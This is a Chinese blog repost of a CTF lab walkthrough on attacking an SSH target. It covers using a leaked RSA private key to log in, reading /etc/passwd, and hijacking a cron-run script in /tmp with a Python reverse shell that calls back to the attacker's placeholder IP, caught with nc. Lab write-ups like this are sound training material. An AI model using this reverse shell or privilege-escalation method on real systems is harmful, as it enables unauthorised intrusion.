CTF-SSH服务渗透

最新推荐文章于 2023-11-23 17:18:45 发布
最新推荐文章于 2023-11-23 17:18:45 发布
阅读量128 收藏
点赞数
文章标签: 运维 python shell
原文链接:http://www.cnblogs.com/-qing-/p/10128973.html
版权

环境

Kali ip 192.168.56.102

Smb 靶机ip 192.168.56.101

 

0x01信息探测

 

首页发现有类似用户名的信息 先记录下来

 

Martin N

Hadi M

Jimmy S

 

Nikto进行对http服务的信息探测

 

 

 

发现rsa敏感密钥文件  wgetkali

 

重命名为id_rsa 作为我们ssh的登录的私钥

 

 

通过前面收集类似的用户名 作为ssh登录尝试

 

将私钥文件权限改成可读可写

 

登录成功

 

查看有哪些用户名

 

0x02 提升权限 查找flag

 

 

cat /etc/passwd     查看所有用户的列表

cat /etc/group       查看用户组

find / -user 用户名  查看属于某些用户的文件

/tmp   查看缓冲文件目录

 

 

 

查看所有用户的列表

 

查看用户组

 

查看缓冲文件目录

 

因为缓冲文件目录下的文件都是隐藏 需要使用ls -alh查看

 

通过 /etc/crontab 文件,设定系统定期执行的任务,编辑,需要root权限。不同的用户都可以有不同的定时任务

 

 

查看计划文件

 

可以发现

Jimmy用户定期执行python /tmp/sekurity.py文件

 

我们可以把执行的文件改成我们的python反弹shell

#!/usr/bin/python

import os,subprocess,socket

 

s=socket.socekt(socket.AF_INET,socket.SOCK_STREAM)

s.connect((“攻击机IP地址”,”攻击机监听端口”))

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1)

os.dup2(s.fileno(),2)

p=subprocess.call([/bin/sh,-i])

 

 

通过ssh上传至我们的靶机

 

然后通过nc -lvp 端口 进行shell监听

 

转载于:https://www.cnblogs.com/-qing-/p/10128973.html

weixin_30835933
关注
CTF-SSH私钥泄露(超详细)
wangzhemvp的博客
10-04 188
可以看到buf[20]变量,通过溢出来提权,输入超过他缓存字符长度的字符 超出的部分为root权限的目录路径。对于给定IP地址的靶机,我们需要对其扫描,探测到开放的服务信息。渗透其实是针对服务的漏洞探测,然后进行对应的数据包发送,获取机器的最高权限。一个服务器对应计算机的一个端口,常用端口0-1023,通过扫描结果查找特殊端口,特别是对于开放的http服务的大端口进行排查。进入到root里,发现两个文件,打开flag.txt文件,但是没有权限。通过查看 ,把/texes放到目录下,就找到第一个flag。
CTF-6.SSH服务渗透
woo233的博客
09-12 1338
SSH为Secure Shell的缩写,由IETF的网络小组(Network Working Group)所制定;SSH为建立在应用层基础上的安全协议。SSH是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用ssH协议可以有效防止远程管理过程中的信息泄露问题。基于TCP 22号端口的服务。在对SSH服务渗透中,大部分情况是利用获取的私钥文件,直接使用用户名和私钥文件登录靶场机器,个别情况进行暴力破解获取用户密码,通过用户名和对应用户登录靶场机器。CTF中要特别注意。
CTF SSH服务root渗透
Kstheme的博客
08-15 2422
工具: kali linux ssh root渗透靶机 操作步骤: ssh协议介绍 SSH为Secure Shell的缩写,由IETF网络小组(Network Working Group)所指定;SSH为建立在应用层基础上的安全协议 SSH是目前较可靠,专为远程登录会话和其他网络提供安全性的协议。利用SSH协议可以有效防止远程管理过程中的信息泄露问题。 SSH最初是UNIX系统上的一个程序,后来又...
CTF训练笔记(二)- SSH渗透root主机
morrino的博客
01-10 3313
在对SSH服务渗透中,大部分情况是利用获取的私钥文件,直接使用用户名和私钥文件登录靶机,偶尔可能还需要暴力破解密码。 CTF中要特别注意: /tmp 数据缓存目录; /etc/crontab 定时任务文件。 [CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
CTF练习:SSH服务渗透root主机
qq_43233085的博客
11-14 1952
CTF练习:SSH服务渗透root主机环境准备信息收集进入靶机背水一战 靶机地址: 链接:https://pan.baidu.com/s/1DI6yPW1ePTsT1U9mqgVZTw 提取码:lwr0 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.75.213 查看靶机的IP,为172.19.75.198 ne...
靶机渗透训练——JIS-CTF-VulnUpload-CTF01
z7sz的博客
06-22 496
这是一篇关于JIS-CTF-VulnUpload-CTF01靶机训练的文章
CTF-SSH 服务渗透综述
su__xiaoyan的博客
12-15 592
SSH协议简介: SSH为Secure Shell的缩写,是建立在应用层基础上的安全协议;SSH是目前较为可靠,专为远程登录会话和其他网络服务提供安全性的协议,利用SSH协议可以有效的防止远程管理过程中的信息泄露问题。 SSH客户端适用于多种平台,几乎所有的UNIX平台都可以运行SSH。基于TCP的22端口。 SSH协议的认证机制: ssh服务以非对称加密的方式实现身份验证 ssh协议的认证机制分为两种形式:基于密码的安全验证 基于秘钥的安全验证 基于密码的安全验证: 客户端发送登录请求 服务
CTF训练之现学现卖--SSH私钥泄露-附件资源
03-05
CTF训练之现学现卖--SSH私钥泄露-附件资源
CTF-SSH服务渗透代码详细解说
weixin_45441727的博客
03-01 1015
首先,我们先理解什么是SSH协议 SSH是(Secure SHell protocol) 的简写,即(安全外壳协议)。由 IETF 的网络小组(Network Working Group)制定。 以前我们都是使用rsh和telnet的明文传输,这样的话登录时的ID和密码数据就会直接在网络上暴露,相当于你在网络上被别人看的一清二楚。存在安全上的问题。而SSH提供了加密、校验和压缩,使得我们可以很安全的进行远程操作。不过这并不是绝对的,总有加密文件被破解的一天。但是相对与明文加密,这样还是好很多的。毕竟有密码和
CTF训练 ssh服务渗透:如何从外部进入最终root主机,取得flag
weixin_44716769的博客
10-31 4377
CTF训练 ssh服务渗透 如何从外部进入最终root主机,取得flag SSH协议介绍 SSH为Secure Shell的缩写,由IETF的网络小组(Network Working Group)所制定;SSH为建立在应用层基础上的安全协议。 SSH是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用ssH协议可以有效防止远程管理过程中的信息泄露问题。 SSH最初是UNIX系统上的一个程序,后来又迅速扩展到其他操作平台。SSH在正确使用时可弥补网络中的漏洞。SSH客户端适用于多种平台。几乎所有
[ctf misc][2021蓝帽杯决赛]ssh_traffic writeup
ShenZ的博客
09-02 1442
[2021蓝帽杯决赛]ssh_traffic 抓取了一段流量, 想知道他们用ssh传输了些什么呢? 附件:ssh_traffic_5e202f7c667dfd9b0398d65bfed46b2c.zip 解压得到traffic.pcapng,总共三个tcp流 过滤:tcp.stream eq 2,得到key,另存为key.json 利用工具network-parser解密ssh流量 network-parser -p traffic.pcapng --popt keyfile=key.json --p
8021-CTF-第十三题-数据包分析
koala_king的博客
12-03 338
题目是数据包分析类 1·提示需要更改请求头的user-agent中浏览器的名称,用burp suite进行抓包 2·将抓包结果send to repeater,更改user-agent中的浏览器名称(将user-agent后面全部删掉,只加上cimer) 3·重新发送,获得了key ...
解决:VMWare虚拟机无法开启,显示模块“Disk”启动失败
热门推荐
一枚程序媛。
05-05 5万+
今天刚打开虚拟机就出现了问题,( ˇˍˇ ) 各种百度之后,找到了解决办法,总结下办法: 我的是直接使用这个就解决了 找到启动虚拟机的目录: 如下图 在此路径中找到.vmx文件,在文件中查找(Ctrl+F快速查找)vmci0.present,此时会看到“vmci0.present = "TRUE"” 修改为FALSE即可。
CTF-利用SSH私钥泄露远程登录提权
Reaches_r的博客
07-31 1349
1
CTF训练 ssh私钥泄露(含靶场下载地址)
ZY_Jack的博客
12-04 2219
这里写目录标题安装靶机探测ip扫描端口,探测隐藏文件扫ssh远程登陆扫ssh2john转换信息,字典解密 安装靶机 探测ip 扫描端口,探测隐藏文件 扫ssh远程登陆 扫ssh2john转换信息,字典解密
网络安全CTF流量分析-入门5-SSH登录流量和Linux基本操作流量
最新发布
m0_51198141的博客
11-23 636
这道题还是比较简单的,只要熟悉基本的Linux命令和得到相应的结果就能根据题目找到答案,重点在于打开TCP流量观察,和对Linux系统的熟练度。欢迎师傅们交流沟通
CTF实践:渗透测试WebDeveloper靶机
10. **远程登录**:实验中通过SSH服务远程登录靶机,这是渗透测试中常见的步骤,可以进一步探索系统内部结构。 11. **tcpdump**:虽然实验中没有详细说明,但`tcpdump`是一个强大的网络封包分析软件,可用于监控...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值